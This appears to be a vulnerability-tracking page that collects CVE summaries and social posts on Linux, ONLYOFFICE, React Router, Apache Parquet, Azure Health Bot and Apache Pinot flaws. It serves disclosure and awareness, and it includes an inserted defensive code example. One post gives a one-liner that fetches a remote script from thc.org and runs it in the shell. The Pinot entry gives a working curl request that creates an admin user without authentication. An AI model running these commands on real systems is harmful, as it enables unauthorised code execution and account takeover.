Overview
- 1902756969
- reggie
Description
Statistics
- 1 Post
- 61 Interactions
Fediverse

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):
“. <(curl -SsfL https://thc.org/7350pipe)”
Overview
Description
Statistics
- 3 Posts
- 3 Interactions
Fediverse

https://seclists.org/oss-sec/2025/q2/0
"The analyze(sic!) of the patch (https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=cbb26f7d8451fe56ccac802c6db48d16240feebd) reveals that the root cause of the bug has been partially fixed."

https://seclists.org/oss-sec/2025/q2/3
"A reason CVE-2024-57882 may have stayed unpatched in a distro is it could have been wrongly believed to be a NULL pointer dereference only due to a specific crash reported by Syzbot."
"net.mptcp.enabled can be set from inside an unprivileged net namespace"
Overview
Description
Statistics
- 1 Post
- 14 Interactions
Fediverse

this 11yo CVE aged well
Overview
Description
Statistics
- 1 Post
- 13 Interactions
Fediverse

Researchers, you don't need to be this patient. Just publish that shit.
https://medium.com/@mihat2/onlyoffice-document-server-path-traversal-fdd573fec291
Directory Traversal vulnerability in ONLYOFFICE Document Server v.7.5.0 and before allows a remote attacker to obtain sensitive information via a crafted file upload.
- October 10, 2023 – The moment I realized the flaw was real, I immediately reached out to ONLYOFFICE’s security team. To my surprise, they responded the same day! To ensure they had all the details, I sent them a thorough PDF report outlining the vulnerability, complete with technical analysis, proof-of-concept, and potential impact. I thought this was going to be a smooth disclosure process — how wrong I was.
- October 11 — November 19, 2023 — I followed up. Again. And again. Silence. Maybe my emails were lost? Maybe they were ignoring me? Either way, weeks passed, and still — no response.
- November 20, 2023 – We submitted the vulnerability to HackerOne, hoping to reach ONLYOFFICE through another channel.
- December 4, 2023 – With no response from HackerOne, we escalated the report to HackerOne Disclosure Assistance, but STILL received no response.
- February 19, 2024 – ONLYOFFICE finally responded, stating that they were working on a fix.
- February 26, 2024 – ONLYOFFICE released a fix for the vulnerability.
- April 1, 2024 – ONLYOFFICE informed us that while the fix was available, some products would not receive the security patch until Summer 2024. They requested that we delay public disclosure until July 2024.
- February 21, 2025 – HackerOne Disclosure Assistance responded, stating that they were reviewing the backlog and asked for an update on the current situation.
Overview
- remix-run
- react-router
Description
Statistics
- 1 Post
- 7 Interactions
Fediverse

Simple and practical vulns like this are always nice to read about and learn from and replicate.
https://github.com/remix-run/react-router/security/advisories/GHSA-4q56-crqp-v477
sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
React Router is a multi-strategy router for React bridging the gap from React 18 to React 19. There is a vulnerability in Remix/React Router that affects all Remix 2 and React Router 7 consumers using the Express adapter. Basically, this vulnerability allows anyone to spoof the URL used in an incoming Request by putting a URL pathname in the port section of a URL that is part of a Host or X-Forwarded-Host header sent to a Remix/React Router request handler. This issue has been patched and released in Remix 2.16.3 and React Router 7.4.1.
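The port check that the advisory text above calls for, as an added example (not code from React Router, Remix or the advisory). The function names, host names and header values are constructed for illustration, and `buildRequestUrlNaive` only models the described behaviour of treating whatever follows the colon in the Host header as the port.

```javascript
// Added example: rebuilding the request URL from Host / X-Forwarded-Host,
// first without and then with a numeric-port check.
// All names and sample values are constructed for illustration.

// Naive form: whatever follows the first ":" in the header is used as the port.
function buildRequestUrlNaive(protocol, hostname, hostHeader, originalUrl) {
  const [, port] = hostHeader.split(":");
  const authority = port ? `${hostname}:${port}` : hostname;
  return new URL(`${protocol}://${authority}${originalUrl}`);
}

// Hardened form: accept a port only if the whole header is host[:port] and the
// port is 1-5 digits within 1..65535; anything else yields no port at all.
function parsePort(hostHeader) {
  if (typeof hostHeader !== "string") return undefined;
  // IPv6 literals look like "[::1]:3000"; the port follows the closing bracket.
  const m = /^(?:\[[0-9a-fA-F:.]+\]|[^:\[\]\/?#@,\s]+)(?::(\d{1,5}))?$/.exec(hostHeader);
  if (!m || m[1] === undefined) return undefined;
  const n = Number(m[1]);
  return n >= 1 && n <= 65535 ? n : undefined;
}

// hostname is assumed to come from the framework's own host parsing
// (for Express, req.hostname); only the port is taken from the raw headers.
function buildRequestUrlChecked(protocol, hostname, headers, originalUrl) {
  const port = parsePort(headers["x-forwarded-host"]) ?? parsePort(headers["host"]);
  const authority = port ? `${hostname}:${port}` : hostname;
  return new URL(`${protocol}://${authority}${originalUrl}`);
}

function demo() {
  const spoofed = { host: "app.example:/admin" }; // constructed header value
  const normal = { host: "app.example:3000" };    // constructed header value
  return {
    // The "port" is a pathname, so it is prepended to the real request path.
    naive: buildRequestUrlNaive("http", "app.example", spoofed.host, "/public/page").pathname,
    // The non-numeric port is dropped and the path the client sent is kept.
    checked: buildRequestUrlChecked("http", "app.example", spoofed, "/public/page").pathname,
    // A legitimate numeric port still round-trips.
    normal: buildRequestUrlChecked("http", "app.example", normal, "/public/page").href,
  };
}
```

Any routing or access decision that reads the rebuilt URL's pathname sees the spoofed prefix in the naive form, which is why upgrading to the patched releases named in the advisory is the fix rather than filtering in application code alone.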
Overview
- Apache Software Foundation
- Apache Parquet Java
- org.apache.parquet:parquet-avro
Description
Statistics
- 1 Post
- 5 Interactions
Fediverse

And we have a perfect 10 in Apache Parquet, whatever that is. 🥳
sev:CRIT 10.0 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code.
Users are recommended to upgrade to version 1.15.1, which fixes the issue.
Overview
- Microsoft
- Azure Health Bot
Description
Statistics
- 1 Post
- 4 Interactions
Fediverse

Another Microsoft cloud service vuln got patched. They claim no exploitation and it wasn't publicly known so you should be okay but that trust thing is hard.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21384
sev:HIGH 8.3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
An authenticated attacker can exploit a Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure Health Bot to elevate privileges over a network.
Overview
- Kentico
- Xperience
Description
Statistics
- 1 Post
- 2 Interactions
Overview
- Apache Software Foundation
- Apache Pinot
- org.apache.pinot.controller.api
Description
Statistics
- 1 Post
- 2 Interactions
Fediverse

I don't know Apache Pinot but this seems like a good one to keep in your back pocket.
https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
Authentication Bypass Issue
If the path does not contain "/" and contains ".", authentication is not required.
Expected Normal Request and Response Example
curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users
Return: {"code":401,"error":"HTTP 401 Unauthorized"}
Malicious Request and Response Example
curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return: {"users":{}}